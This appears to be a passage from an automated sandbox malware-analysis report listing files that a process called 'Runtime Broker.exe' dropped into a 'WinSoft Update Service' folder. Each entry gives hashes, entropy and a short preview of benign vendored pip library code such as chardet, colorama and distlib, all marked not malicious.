Entropy (8bit):	4.692886314249317
Encrypted:	false
SSDEEP:	96:Kt17u4Mp2KY6HtQyylEl+ii/m98jWTIIRpB:Kt17u4MsKY6ieTz
MD5:	49A4BAE5A91B2CDF3E86CCBE5C891978
SHA1:	AC5FA06EF33A62E12D3F676223F2BA443410AD08
SHA-256:	208B7E9598F4589A8AE2B9946732993F8189944F0A504B45615B98F7A7A4E4C4
SHA-512:	EA7A9B2EEED35A999302D3B3721A8766417BCCA52EEED47025FD634647EB2E0311C74845CCD331303867956294BAD4B288840D88BCE562FD33BDDFD7130E29B1
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\universaldetector.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	12485
Entropy (8bit):	4.480041085623877
Encrypted:	false
SSDEEP:	192:Ptzcu4QKIAlBCWcu77VT4/SqUvhPvD2o8utlH+f0uTbDYq:mu43LjV5vhnRLtxuHDH
MD5:	3D32E35A67B1C0762CC32825710E274D
SHA1:	27152189FA8DBF05D7263918938DFBC77912C419
SHA-256:	A8BD35EF8952644E38D9E076D679E4B53F7F55C0327B4EE5685594794AE3B6D6
SHA-512:	0484A28056CDB1CFD448FEE3D893461D5FC7342CB3124B22B15CB90844496E78C9A776556804B42924DFA4A6558DEA11146999D7DD77AA06D5F324EA606FB027
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is Mozilla Universal charset detector code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 2001.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.# Shy Shalom - original C code.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Publi

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\utf8prober.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2766
Entropy (8bit):	4.833784610060913
Encrypted:	false
SSDEEP:	48:Kx/1ef0uwyUjHSUr/J0/dD2bbIQ6H5RZvMalElKTYtIIJs:Kt17u4R/J0uIQ6Hh9lElLtIIq
MD5:	E6180774C6437E9A396353411EDDCB36
SHA1:	35EF3BB735C68E457746E85E7C410CEB2ADA711A
SHA-256:	21D0FCBF7CD63AC07C38B8B23E2FB2FDFAB08A9445C55F4D73578A04B4AE204C
SHA-512:	77510EBF5AA4A8AB8CDA47A44D538E453F9BFE0A0332094A753CB7DF84DDDA9BB03757D609F9A1809898611F938F5553EEC370197BDEF9182629F2F4FD9250DF
Malicious:	false
Preview:	######################## BEGIN LICENSE BLOCK ########################.# The Original Code is mozilla.org code..#.# The Initial Developer of the Original Code is.# Netscape Communications Corporation..# Portions created by the Initial Developer are Copyright (C) 1998.# the Initial Developer. All Rights Reserved..#.# Contributor(s):.# Mark Pilgrim - port to Python.#.# This library is free software; you can redistribute it and/or.# modify it under the terms of the GNU Lesser General Public.# License as published by the Free Software Foundation; either.# version 2.1 of the License, or (at your option) any later version..#.# This library is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU.# Lesser General Public License for more details..#.# You should have received a copy of the GNU Lesser General Public.# License along with this library; if not, write to th

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\chardet\version.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	242
Entropy (8bit):	4.954872374613132
Encrypted:	false
SSDEEP:	6:2EJMHUYLQBHmZvDDntuFFeHNDdESzQPXqMC42yVwLQF6fIX:8HYGZvVuaXE7vqMw0MIX
MD5:	0EC6AEE3B10783F4FA3C37C8AEABB8A6
SHA1:	575C23553E54642B5BEA47E65B44F55EB446EF79
SHA-256:	B29DC1D3C9AB0D707EA5FDCAF5FA89FF37831CE08B0BC46B9E04320C56A9FFB8
SHA-512:	722DE93691E0ED19A4485BE73A776CB323F79BE057254DAEECEF9BE0B4CA583C775014E147684C4AF2A4F9B0287C51BBAE01599B9C4A4FBAE0A669C8C3CDC117
Malicious:	false
Preview:	""".This module exists only to simplify retrieving the version number of chardet.from within setup.py and from chardet subpackages...:author: Dan Blanchard (dan.blanchard@gmail.com)."""..__version__ = "3.0.4".VERSION = __version__.split('.').

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	239
Entropy (8bit):	4.864879571864847
Encrypted:	false
SSDEEP:	6:S3cSFtEXVIoTs1W8VtAiAGy21cgJmFMxPMxKyKT6iY3Cv:Qc2tqIoTs48VLA1pYPMxKjT6E
MD5:	BF9DB5EDDFEA1FC7EFA0D9D621A57D52
SHA1:	97C20BABC2F640C932D7F64806FFF81981D45506
SHA-256:	A42744AEBCB32D2CC35B93FEAD13C194F2EA6C1B4844D241E9C320A1E267B399
SHA-512:	14D6653A099F9E2DDA3DD19ECA22E75143E4D72B602FD07C774654372EBBC982F3E5FC8333C39B03EC18E81E5174F9E3B53FCF122D9E4A421B62A7E12B95F0EF
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..from .initialise import init, deinit, reinit, colorama_text.from .ansi import Fore, Back, Style, Cursor.from .ansitowin32 import AnsiToWin32..__version__ = '0.4.4'.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\ansi.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2522
Entropy (8bit):	4.698572934399895
Encrypted:	false
SSDEEP:	48:Utghm2eyryyem/yB/bylEylVrLZfGRoHbrrnx44yiwRlEci4CGVlW0RLf37aNqE4:UtghReYyeyNbuEuVZmmx45YcHCSMYLfv
MD5:	F781D59416D57343BE4FA5AA95675F57
SHA1:	A46F95349F8D9E1D10885510F90A4F0C19380AE3
SHA-256:	4E8A7811E12E69074159DB5E28C11C18E4DE29E175F50F96A3FEBF0A3E643B34
SHA-512:	54396288C653A9BA5259FF3FB30079C31B157C0FD124DE345B6C8299923C08109283229E24D2E11294241BF6B78CA370CCD28F1AE605534876C4DAE43A2E7ACE
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..'''.This module generates ANSI character codes to printing colors to terminals..See: http://en.wikipedia.org/wiki/ANSI_escape_code.'''..CSI = '\033['.OSC = '\033]'.BEL = '\a'...def code_to_chars(code):. return CSI + str(code) + 'm'..def set_title(title):. return OSC + '2;' + title + BEL..def clear_screen(mode=2):. return CSI + str(mode) + 'J'..def clear_line(mode=2):. return CSI + str(mode) + 'K'...class AnsiCodes(object):. def __init__(self):. # the subclasses declare class attributes which are numbers.. # Upon instantiation we define instance attributes, which are the same. # as the class attributes but wrapped with the ANSI escape sequence. for name in dir(self):. if not name.startswith('_'):. value = getattr(self, name). setattr(self, name, code_to_chars(value))...class AnsiCursor(object):. def UP(self, n=1):. retur

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\ansitowin32.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10517
Entropy (8bit):	4.62702219520237
Encrypted:	false
SSDEEP:	96:UtyZ8tlW/vTYhX8J60C8Io/v9VosvwkdBapR1Qip8bZeh/owG6xFMxKf:UIGtzhsJ5C8lWawOgkipCicLE
MD5:	CC62E5B793FABB96B5A3B89F5B3FF3F5
SHA1:	44BDA28221C827BEFCCB44C0BF26F67B58A1912D
SHA-256:	C95EC212609BD7D3239C928E0D9104BCC1FF7E76C98709E9CE8E2CC59B865E60
SHA-512:	45F9EB23C4DDF8593BB4DEBA7200876F860F59C45849B0347B468FEB4F052F20E5889C00FEDD67DA46914F62E4E6BD8EE30B02392F4FECF5BF76EF1D974D4DD3
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import re.import sys.import os..from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style, BEL.from .winterm import WinTerm, WinColor, WinStyle.from .win32 import windll, winapi_test...winterm = None.if windll is not None:. winterm = WinTerm()...class StreamWrapper(object):. '''. Wraps a stream (such as stdout), acting as a transparent proxy for all. attribute access apart from method 'write()', which is delegated to our. Converter instance.. '''. def __init__(self, wrapped, converter):. # double-underscore everything to prevent clashes with names of. # attributes on the wrapped stream object.. self.__wrapped = wrapped. self.__convertor = converter.. def __getattr__(self, name):. return getattr(self.__wrapped, name).. def __enter__(self, args, *kwargs):. # special method lookup bypasses __getattr__/__getattribute__, see. # https://stackov

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\initialise.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	modified
Size (bytes):	1915
Entropy (8bit):	4.4850329283773425
Encrypted:	false
SSDEEP:	48:UtLj2eU+xNsLkW9KuflxptRccBRRQQQ7h096V2WORK9Rrm0E:UtLTUj5RcWRphRUR3E
MD5:	3581185F5015657CC4A9800C1299FD68
SHA1:	52B59CF1CFF0E66D2B32F11E12054E111AAE91DB
SHA-256:	3E9AE8BC3371313AEFA0D1C570BD8D663A47D97CC373C04BC4BC6212B7D49789
SHA-512:	B454E27A89F2D5C85842AE4ACF7A18EA8F7D1979151D9D9C5CDBF8382504F74147E740531B761C2E39F09543E71B0EC2864035B798EC9AD28C3530E440596B1A
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..import atexit.import contextlib.import sys..from .ansitowin32 import AnsiToWin32...orig_stdout = None.orig_stderr = None..wrapped_stdout = None.wrapped_stderr = None..atexit_done = False...def reset_all():. if AnsiToWin32 is not None: # Issue #74: objects might become None at exit. AnsiToWin32(orig_stdout).reset_all()...def init(autoreset=False, convert=None, strip=None, wrap=True):.. if not wrap and any([autoreset, convert, strip]):. raise ValueError('wrap=False conflicts with any other arg=True').. global wrapped_stdout, wrapped_stderr. global orig_stdout, orig_stderr.. orig_stdout = sys.stdout. orig_stderr = sys.stderr.. if sys.stdout is None:. wrapped_stdout = None. else:. sys.stdout = wrapped_stdout = \. wrap_stream(orig_stdout, convert, strip, autoreset, wrap). if sys.stderr is None:. wrapped_stderr = None. else:. sys.std

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\win32.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5404
Entropy (8bit):	4.824299845538465
Encrypted:	false
SSDEEP:	96:UtfqHA607vSEzL3a0XgCuBdIz6BzP46BU4cj5uTYeK3JLAHArhNDLJLAHGVrxo+:UpcAVGVO4X8eoZAHArhNDLZAHGVr2+
MD5:	77C93060C4C5871000A173E106A0575D
SHA1:	32C65C7097FBE415781D4F600DCCA4429D2F8702
SHA-256:	6C9F0897D8F0681379049F1B98DE85A18675418B8C2AFDA3F1F1AB5E1ED3263C
SHA-512:	5D40E1B30D285BA06B6A07AC849F7923FEA13790E0814E9C7CFE5C4F1BB29DC5D1083305BFCA17C77279482FF63A590A634533E16F9A5FD33C71582D81F8BCB8
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file...# from winbase.h.STDOUT = -11.STDERR = -12..try:. import ctypes. from ctypes import LibraryLoader. windll = LibraryLoader(ctypes.WinDLL). from ctypes import wintypes.except (AttributeError, ImportError):. windll = None. SetConsoleTextAttribute = lambda _: None. winapi_test = lambda _: None.else:. from ctypes import byref, Structure, c_char, POINTER.. COORD = wintypes._COORD.. class CONSOLE_SCREEN_BUFFER_INFO(Structure):. """struct in wincon.h.""". _fields_ = [. ("dwSize", COORD),. ("dwCursorPosition", COORD),. ("wAttributes", wintypes.WORD),. ("srWindow", wintypes.SMALL_RECT),. ("dwMaximumWindowSize", COORD),. ]. def __str__(self):. return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % (. self.dwSize.Y, self.dwSize.X. , self.dwCursorPosition.Y, self.dwCursorPosition

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\colorama\winterm.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	6438
Entropy (8bit):	4.595677775904153
Encrypted:	false
SSDEEP:	96:UtV14HaGq4sGmJ+w0RwWD7FfTLg3j4C1b8bvPBQbhvTOUg3tKrZ0KfJkp3tKKf88:Ur1eD8wVTQrZVc7
MD5:	BAC76C7770EDD84945C222FDB3AB3CA5
SHA1:	9F134AC65B5147B4144E0C009BF47C743C3B5B76
SHA-256:	DB2FF66FB66CBF7E1F780B0FEBB98B39573E060AB9D667581A8E7BD55A6B96B3
SHA-512:	81A86B6E6658DA764280DB31C8BC07580D9FD0DDB26C12541AC2DA7E3440D2A67C0A9757D4B13386F9A9F5FF5F924032F2739A2985D463FF91A8F8B7E3659844
Malicious:	false
Preview:	# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file..from . import win32...# from wincon.h.class WinColor(object):. BLACK = 0. BLUE = 1. GREEN = 2. CYAN = 3. RED = 4. MAGENTA = 5. YELLOW = 6. GREY = 7..# from wincon.h.class WinStyle(object):. NORMAL = 0x00 # dim text, dim background. BRIGHT = 0x08 # bright text, dim background. BRIGHT_BACKGROUND = 0x80 # dim text, bright background..class WinTerm(object):.. def __init__(self):. self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes. self.set_attrs(self._default). self._default_fore = self._fore. self._default_back = self._back. self._default_style = self._style. # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.. # So that LIGHT_EX colors and BRIGHT style do not clobber each other,. # we track them separately, since LIGHT_EX is overwritten

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\contextlib2.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	16915
Entropy (8bit):	4.3939066887726135
Encrypted:	false
SSDEEP:	384:P0RDzzAYVKbfhdgAylWfUADZJnzQCT2eYXE:P0RDz0hdgAbf9jngXE
MD5:	00407811E6F321118293D04865E77E53
SHA1:	3851B85E2B32D9CCE2BBF9F367EDBEC398BCCBD1
SHA-256:	E478C67E5533C160147DC20B852982D86AAFA1875967317355F203CED1E2814B
SHA-512:	F37C0EE0AA13D34FA40808C1668C9C9EF8EBB4DD0C13B736322610F5DAF3218318B73181D85EFDA4AEED8F30D902E3CD1AD6C6CF080F3A862487D3F78C4B86DF
Malicious:	false
Preview:	"""contextlib2 - backports and enhancements to the contextlib module"""..import abc.import sys.import warnings.from collections import deque.from functools import wraps..__all__ = ["contextmanager", "closing", "nullcontext",. "AbstractContextManager",. "ContextDecorator", "ExitStack",. "redirect_stdout", "redirect_stderr", "suppress"]..# Backwards compatibility.__all__ += ["ContextStack"]...# Backport abc.ABC.if sys.version_info[:2] >= (3, 4):. _abc_ABC = abc.ABC.else:. _abc_ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()})...# Backport classic class MRO.def _classic_mro(C, result):. if C in result:. return. result.append(C). for B in C.__bases__:. _classic_mro(B, result). return result...# Backport _collections_abc._check_methods.def _check_methods(C, *methods):. try:. mro = C.__mro__. except AttributeError:. mro = tuple(_classic_mro(C, [])).. for method in methods:. for B in mro:.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	581
Entropy (8bit):	4.982327541057274
Encrypted:	false
SSDEEP:	12:icKyfObIo6X9L0+z6HY8UHyaUMwZYBuEBRtEw35w12gvL0AILDGT3W3Tw:lM6X7zBHH882G6iOkk
MD5:	E6DBE6047480B6D901930535295DB711
SHA1:	E820593DAC324DFE14F886AB4E6DCD4F1EDA3600
SHA-256:	DEF780936ACFCE7381DA0B0AEAD8DB6E1D1340C9861393FCD9E13DC17ABA3489
SHA-512:	ECBB4E91B1D7F7FB227654881130CDF08FACE041E49B2A1B1A6A671EBB611C5B68544DC1968DDB484178918537AC6D569178F2EAEB8361FD9E100926D6116A74
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2012-2019 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.import logging..__version__ = '0.3.1'..class DistlibException(Exception):. pass..try:. from logging import NullHandler.except ImportError: # pragma: no cover. class NullHandler(logging.Handler):. def handle(self, record): pass. def emit(self, record): pass. def createLock(self): self.lock = None..logger = logging.getLogger(__name__).logger.addHandler(NullHandler()).

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\compat.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, UTF-8 Unicode text executable
Category:	dropped
Size (bytes):	41408
Entropy (8bit):	4.2691302972113165
Encrypted:	false
SSDEEP:	768:SxEHZLt+vZMH7R2jubyaXyOwFXBhKBh+/Wk:SxgZUvZw2YuXBhKBh+uk
MD5:	1B85A38C8E723702BFE8750566137B04
SHA1:	823E0A7747A410766DAFAC9E62E25D1FC0CBBD6D
SHA-256:	003039EB1880C5AAF7994EAA7A694184D6ECAC53E8B174613B8E11CEC6C93EA9
SHA-512:	29EB8F3D90B95C437156EC20E8CCA14921F50828DB1AFB4D7F0C68F4F09891FE4AC5EE6399D2108D0DF11495BAF1DE085CF65D9278F415C6241E3E4468377CE2
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2013-2017 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.from __future__ import absolute_import..import os.import re.import sys..try:. import ssl.except ImportError: # pragma: no cover. ssl = None..if sys.version_info[0] < 3: # pragma: no cover. from StringIO import StringIO. string_types = basestring,. text_type = unicode. from types import FileType as file_type. import __builtin__ as builtins. import ConfigParser as configparser. from ._backport import shutil. from urlparse import urlparse, urlunparse, urljoin, urlsplit, urlunsplit. from urllib import (urlretrieve, quote as _quote, unquote, url2pathname,. pathname2url, ContentTooShortError, splittype).. def quote(s):. if isinstance(s, unicode):. s = s.encode('utf-8'). return _quote(s).. import urllib2. from urllib2 impo

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\database.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	51059
Entropy (8bit):	4.273854388218781
Encrypted:	false
SSDEEP:	768:tufonQyKxMkUpeTHU8JhOQfRcYKOnhF03TwTVpzBq6xH+9R:tufonkxMp2UuPnhF03yzBqeH+9R
MD5:	575B74E30F39DB81C9DCE085B3A1CE42
SHA1:	5D9B0E94591C90BDD0ABD6CDE82B4BF0E8CA4007
SHA-256:	2A5D18BCF40A73839CA558BB939705CE2C9D335C4E2BC8AA7712C65E06D91D5E
SHA-512:	2FC20DF9D2D2B06F5E94DA504E8738015DABDA7CA8BB677BA18421FC59A7C7AEAC2C3E1CF390556CF685DC79399751BE0509BB81D4AF7F40C42F5AA36266B446
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2012-2017 The Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#."""PEP 376 implementation."""..from __future__ import unicode_literals..import base64.import codecs.import contextlib.import hashlib.import logging.import os.import posixpath.import sys.import zipimport..from . import DistlibException, resources.from .compat import StringIO.from .version import get_scheme, UnsupportedVersionError.from .metadata import (Metadata, METADATA_FILENAME, WHEEL_METADATA_FILENAME,. LEGACY_METADATA_FILENAME).from .util import (parse_requirement, cached_property, parse_name_and_version,. read_exports, write_exports, CSVReader, CSVWriter)...__all__ = ['Distribution', 'BaseInstalledDistribution',. 'InstalledDistribution', 'EggInfoDistribution',. 'DistributionPath']...logger = logging.getLogger(__name__)..EXPORTS_FILENAME = 'pydist-exports.json'.COMMANDS_FILENAME = 'pydist-commands.j

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\index.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	21066
Entropy (8bit):	4.23244363298365
Encrypted:	false
SSDEEP:	384:JULg25qdvtL5wytjzSWDwWiIhreHjbnzNVhF9zm4oI:JZ2ItPuIcDbL9zm4oI
MD5:	257BFF778A7A0413D27AE816377C04DE
SHA1:	DF0AAC19495F85C4DE57F566C009D4A7D9BF97DC
SHA-256:	4972B3A5008445CB71603329FCE2DE7B67F42747B5F5984674222832551F5103
SHA-512:	F61B65BA31EAF60DC99E3B59093C26E28C758C850E3E21F0C08434AE9E2102A88FFADAB6D2E50FD257D37986417287A7D3D0E55E752B05E6343DEBB6116AAEBB
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2013 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.import hashlib.import logging.import os.import shutil.import subprocess.import tempfile.try:. from threading import Thread.except ImportError:. from dummy_threading import Thread..from . import DistlibException.from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,. urlparse, build_opener, string_types).from .util import cached_property, zip_dir, ServerProxy..logger = logging.getLogger(__name__)..DEFAULT_INDEX = 'https://pypi.org/pypi'.DEFAULT_REALM = 'pypi'..class PackageIndex(object):. """. This class represents a package index compatible with PyPI, the Python. Package Index.. """.. boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'.. def __init__(self, url=None):. """. Initialise an instance... :param url: The URL of the

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\locators.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	52100
Entropy (8bit):	4.21201143674365
Encrypted:	false
SSDEEP:	768:Zh/qtuJB17TsOcKvoLukX7hIJbQw8DbFLF+8OyHLi/L50Bi1ygsaow+R:Zh/qtKj7ncKvKdIIxh+880iea6
MD5:	DC14B6A64D29F09C50121D467A5AC996
SHA1:	DB3A5315C1986055E2328743D8CB98176BE86E4F
SHA-256:	73D13870311A709FEE29BB84E41A805687285A9EABB2E0464E488D0D0AB7CD5E
SHA-512:	39EAEC0DA3FAA760C5F67612E9477D25371DEC8A35D2C5CF2AFFDFFD37844D984BA36BE170E2F0A7CC5CBB06FD008509336FB10FF253B5E3BE79ABDB3484474D
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2012-2015 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#..import gzip.from io import BytesIO.import json.import logging.import os.import posixpath.import re.try:. import threading.except ImportError: # pragma: no cover. import dummy_threading as threading.import zlib..from . import DistlibException.from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,. queue, quote, unescape, string_types, build_opener,. HTTPRedirectHandler as BaseRedirectHandler, text_type,. Request, HTTPError, URLError).from .database import Distribution, DistributionPath, make_dist.from .metadata import Metadata, MetadataInvalidError.from .util import (cached_property, parse_credentials, ensure_slash,. split_filename, get_project_data, parse_requirement,. parse_name

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\manifest.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	14811
Entropy (8bit):	4.266549506154093
Encrypted:	false
SSDEEP:	192:1jx0nZn1bxKXbeOdIkX7tetiBGFqq/TWXttZi9b9VDhPBvjk:1jan277teHFqqCXnZsPpjk
MD5:	8FD3BF94B1764E6AD94BC5AF506875D7
SHA1:	123BF09D0DC6B63D0EB99667926AD6FEA08CA060
SHA-256:	9D0121626828ADE681673C85CF062C5F124046EDDFA38124BA7535EB7535EA21
SHA-512:	B605DD50DFDC56534805FDE38C5148324E94A797025DC67F5CFA7280DC7FD773BEB1588DD8A8326623E0600D948F9E38395F1519E505DA4F7FAE80D96C271106
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2012-2013 Python Software Foundation..# See LICENSE.txt and CONTRIBUTORS.txt..#.""".Class representing the list of files in a distribution...Equivalent to distutils.filelist, but fixes some problems..""".import fnmatch.import logging.import os.import re.import sys..from . import DistlibException.from .compat import fsdecode.from .util import convert_path...__all__ = ['Manifest']..logger = logging.getLogger(__name__)..# a \ followed by some spaces + EOL._COLLAPSE_PATTERN = re.compile('\\\\w\n', re.M)._COMMENTED_LINE = re.compile('#.?(?=\n)\|\n(?=$)', re.M \| re.S)..#.# Due to the different results returned by fnmatch.translate, we need.# to do slightly different processing for Python 2.7 and 3.2 ... this needed.# to be brought in for Python 3.6 onwards..#._PYTHON_VERSION = sys.version_info[:2]..class Manifest(object):. """A list of files built by on exploring the filesystem and filtered by. applying various patterns to what we find there..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distlib\markers.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4387
Entropy (8bit):	4.5827674650075885
Encrypted:	false
SSDEEP:	96:vXvpA+/xME7yFq8JPqd6ZmgGmQozsnVQjXJbVJYMSKus/f:PR9d7426ZNwoeQTVYDVsH
MD5:	1BADAE03D913A807F7E704593D969CA5
SHA1:	F1EC9284AB565840B482D0CF5247700653989973
SHA-256:	E807377027C504445EC621125883979A0F9AA483FC9767AC69F3525F728CCBEF
SHA-512:	C558E9F0E0C5710269634329CE72A967DD7D67341C306CEA39F2732FCE111BDEBC6F8E95460623542DF7BC796D65C432F78B48C3D4DD490B5889BF6AEB6D12D5
Malicious:	false
Preview:	# -- coding: utf-8 --.#.# Copyright (C) 2012-2017 Vinay Sajip..# Licensed to the Python Software Foundation under a contributor agreement..# See LICENSE.txt and CONTRIBUTORS.txt..#.""".Parser for the environment markers micro-language defined in PEP 508.."""..# Note: In PEP 345, the micro-language was Python compatible, so the ast.# module could be used to parse it. However, PEP 508 introduced operators such.# as ~= and === which aren't in Python, necessitating a different approach...import os.import sys.import platform.import re..from .compat import python_implementation, urlparse, string_types.from .util import in_venv, parse_marker..__all__ = ['interpret']..def _is_literal(o):. if not isinstance(o, string_types) or not o:. return False. return o[0] in '\'"'..class Evaluator(object):. """. This class is used to evaluate marker expessions.. """.. operations = {. '==': lambda x, y: x == y,. '===': lambda x, y: x == y,. '~=': lambda x, y:

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\distro.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	43628
Entropy (8bit):	4.468932179341862
Encrypted:	false
SSDEEP:	768:bzkCcsApN6ATuPLaE52P6zYp/CkHJtRZGGEwSesB98dJQtOOyWknlbZq:bzznAWxLasUGB1oBOyWgbY
MD5:	B1D8798EDDF25C72E263504CBD24D3ED
SHA1:	2B28799A495CB4599FD0EEFE7C988B642F1ADACC
SHA-256:	C713088766B72A68A9A5E5841F3CA74DD1D3DFF8D9334A3EA68B3474058944E3
SHA-512:	8142102E7A064CA2F2E7D7E0553BD0B262A5D44DD58A083D1A695F980AD39CCA5C57EDF34B749009E84279F6F06575239174FBC966AD91715AAF44A6877F9BE5
Malicious:	false
Preview:	# Copyright 2015,2016,2017 Nir Cohen.#.# Licensed under the Apache License, Version 2.0 (the "License");.# you may not use this file except in compliance with the License..# You may obtain a copy of the License at.#.# http://www.apache.org/licenses/LICENSE-2.0.#.# Unless required by applicable law or agreed to in writing, software.# distributed under the License is distributed on an "AS IS" BASIS,.# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..# See the License for the specific language governing permissions and.# limitations under the License...""".The ``distro`` package (``distro`` stands for Linux Distribution) provides.information about the Linux distribution it runs on, such as a reliable.machine-readable distro ID, or version information...It is the recommended replacement for Python's original.:py:func:`platform.linux_distribution` function, but it provides much more.functionality. An alternative implementation became necessary because Python.3.5 depr

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_vendor\ipaddress.py Download File
